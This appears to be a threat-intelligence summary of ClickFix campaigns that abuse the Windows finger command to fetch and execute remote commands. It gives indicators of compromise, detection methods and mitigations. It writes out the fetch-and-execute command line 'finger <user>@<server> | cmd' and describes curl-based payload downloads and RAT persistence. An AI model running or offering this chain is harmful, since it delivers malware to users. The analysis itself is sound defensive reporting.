Full Report
The decades-old "finger" command is making a comeback,, with threat actors using the protocol to retrieve remote commands to execute on Windows devices. [...]
Analysis Summary
# Tool/Technique: Abuse of the Finger Protocol for Command Execution
## Overview
Threat actors are abusing the decades-old Finger protocol (typically running on TCP port 79) to retrieve remote commands and execute them directly on compromised Windows devices. This technique is being utilized in campaigns disguised as "ClickFix" prompts, tricking users into running commands that fetch and execute secondary payloads.
## Technical Details
- Type: Technique (Protocol Abuse/LOLBIN use)
- Platform: Windows
- Capabilities: Remote command retrieval, execution of retrieved commands via `cmd.exe`, download and execution of secondary malware stages (including infostealers and RATs).
- First Seen: Mentioned in 2020 context; demonstrated in recent ClickFix campaigns.
## MITRE ATT&CK Mapping
- TA0002 - Execution
- T1218 - System Binary Proxy Execution
- T1218.011 - Signed Binary Proxy Execution: System Utilities (While not strictly a signed binary, the use of a legitimate, built-in command line utility for malicious purposes aligns with this category of abuse.)
- TA0011 - Command and Control
- T1071 - Application Layer Protocol
- T1071.004 - Application Layer Protocol: Non-C2 Protocol (Abusing Finger, a non-standard C2 protocol)
## Functionality
### Core Capabilities
- **Remote Command Retrieval:** Executing `finger user@<finger_server>` redirects the output (remote commands) from the Finger daemon back to the local client.
- **Local Execution:** The retrieved output is immediately piped (`|`) into `cmd.exe` for execution, effectively turning the legitimate command into a remote execution mechanism.
- **Payload Delivery:** Commands instruct the victim's system to download ZIP archives disguised as PDF files using `curl.exe` (or renamed copies of `curl.exe`).
### Advanced Features
- **Evasion:** Later variants check for the presence of common malware analysis/research tools (e.g., Procmon, Wireshark, debuggers like OllyDbg, IDA) and will exit if these are detected, indicating anti-analysis capabilities.
- **Multi-stage Payload:** Initial execution results in downloading and extracting a Python malware package (potentially an infostealer) or, in more evolved cases, deploying the NetSupport Manager RAT.
- **Persistence:** The RAT deployment includes configuring a scheduled task to ensure execution upon user login.
## Indicators of Compromise
- File Hashes:
- Batch file example (2020 context): `713d4846f83ef09befbb07f27e2f374b766b8aca4a5a1e937ba39b4dbe3c022d` (SHA256)
- Downloaded archive example (Python package): `032922e952f5f67582ad5a894920794f89b459c477499bd56e57c60f5559f6b4` (SHA256)
- File Names:
- Randomly named files, executables often copied from system utilities (e.g., renamed `curl.exe`).
- Extracted Python package structure: `__init__.py`
- Registry Keys:
- Configuration of a scheduled task (specific keys/names not detailed, but persistence mechanism noted).
- Network Indicators:
- Target user strings observed: `[email protected][.]com`
- Target user strings observed: `[email protected][.]org`
- Target user strings observed: `[email protected][.]com`
- Download domain observed: `cloudmega[.]org`
- Behavioral Indicators:
- Execution of `cmd /c start "" /min cmd /c "finger <user>@<server> | cmd"`
- Process creation involving `pythonw.exe` executing a malicious script.
- Outbound TCP connection attempts to port 79.
## Associated Threat Actors
- Associated with **ClickFix** social engineering campaigns.
- Likely a single threat actor group based on the current reporting, though the methods (using `finger`) have been warned about since 2020.
## Detection Methods
- Signature-based detection: Signatures for known uploaded payloads (Python package, NetSupport Manager RAT).
- Behavioral detection: Monitoring for the execution chain involving the `finger` command piping output directly to `cmd.exe`.
- YARA rules if available: Not specifically mentioned for network traffic or system binaries, but YARA rules could target the extracted Python malware or NetSupport Manager configuration files.
## Mitigation Strategies
- **Network Blocking:** Block all outgoing traffic to **TCP port 79** (Finger protocol) at the network perimeter or host firewall level.
- **Protocol Disabling:** Ensure the Finger service is disabled on internal Windows systems where it is not explicitly required.
- **User Awareness:** Educate users to be suspicious of unexpected prompts ("Verify you are human") requiring them to run commands in `Win+R` or Command Prompt.
## Related Tools/Techniques
- Abuse of other LOLBINs for remote command execution (e.g., PowerShell, certutil, bitsadmin, msiexec).
- Traditional C2 using common protocols (HTTP/S, DNS).
- NetSupport Manager RAT (deployed payload).